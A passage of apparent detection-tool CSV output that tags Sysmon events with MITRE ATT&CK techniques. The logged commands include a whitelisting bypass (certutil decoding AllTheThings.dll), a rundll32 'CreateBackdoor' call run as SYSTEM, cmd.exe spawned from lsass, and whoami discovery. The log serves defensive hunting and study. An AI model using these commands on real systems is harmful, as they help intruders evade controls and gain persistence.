<Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil -f -decode fi.b64 AllTheThings.dll )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:32:59.234755Z"">
</TimeCreated>
<EventRecordID>4890</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:32:58.940</Data>
<Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010FFF28500</Data>
<Data Name=""ProcessId"">700</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil -f -decode fi.b64 AllTheThings.dll </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
<Data Name=""ParentProcessId"">3184</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T18:10:42.668784Z"">
</TimeCreated>
<EventRecordID>16150</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-11 18:10:42.653</Data>
<Data Name=""ProcessGuid"">365ABB72-1022-5CD7-0000-0010DF121C00</Data>
<Data Name=""ProcessId"">3248</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-8693-5CD7-0000-0010765E0000</Data>
<Data Name=""ParentProcessId"">492</Data>
<Data Name=""ParentImage"">C:\Windows\System32\lsass.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\lsass.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1140] Deobfuscate/Decode Files or Information,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ) tried decoding file or information,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:32:59.234755Z"">
</TimeCreated>
<EventRecordID>4890</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:32:58.940</Data>
<Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010FFF28500</Data>
<Data Name=""ProcessId"">700</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil -f -decode fi.b64 AllTheThings.dll </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
<Data Name=""ParentProcessId"">3184</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:32:59.234755Z"">
</TimeCreated>
<EventRecordID>4890</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:32:58.940</Data>
<Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010FFF28500</Data>
<Data Name=""ProcessId"">700</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil -f -decode fi.b64 AllTheThings.dll </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
<Data Name=""ParentProcessId"">3184</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.980991Z"">
</TimeCreated>
<EventRecordID>243512</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.504</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
<Data Name=""ProcessId"">4848</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564834100.731416,2019-08-03T16:08:20.731416+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T12:08:19.915120Z"">
</TimeCreated>
<EventRecordID>5447</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 12:08:19.888</Data>
<Data Name=""ProcessGuid"">747F3D96-7933-5D45-0000-0010227E0701</Data>
<Data Name=""ProcessId"">6000</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-7930-5D45-0000-001055DE0601</Data>
<Data Name=""ParentProcessId"">4740</Data>
<Data Name=""ParentImage"">C:\Windows\System32\consent.exe</Data>
<Data Name=""ParentCommandLine"">consent.exe 896 318 0000028064471300</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.980991Z"">
</TimeCreated>
<EventRecordID>243512</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.504</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
<Data Name=""ProcessId"">4848</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.980991Z"">
</TimeCreated>
<EventRecordID>243512</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.504</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
<Data Name=""ProcessId"">4848</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /groups) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:48.359432Z"">
</TimeCreated>
<EventRecordID>17717</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:48.342</Data>
<Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-0010F76F1300</Data>
<Data Name=""ProcessId"">3964</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /groups</Data>
<Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
<Data Name=""LogonId"">0x13587</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
<Data Name=""ParentProcessId"">2016</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /groups ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:48.359432Z"">
</TimeCreated>
<EventRecordID>17717</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:48.342</Data>
<Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-0010F76F1300</Data>
<Data Name=""ProcessId"">3964</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /groups</Data>
<Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
<Data Name=""LogonId"">0x13587</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
<Data Name=""ParentProcessId"">2016</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami /priv) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-10T13:33:29.424885Z"">
</TimeCreated>
<EventRecordID>15678</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1948"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-10 13:33:29.409</Data>
<Data Name=""ProcessGuid"">365ABB72-7DA9-5CD5-0000-00100ED31400</Data>
<Data Name=""ProcessId"">2524</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami /priv</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-79DF-5CD5-0000-0020F8410100</Data>
<Data Name=""LogonId"">0x141f8</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
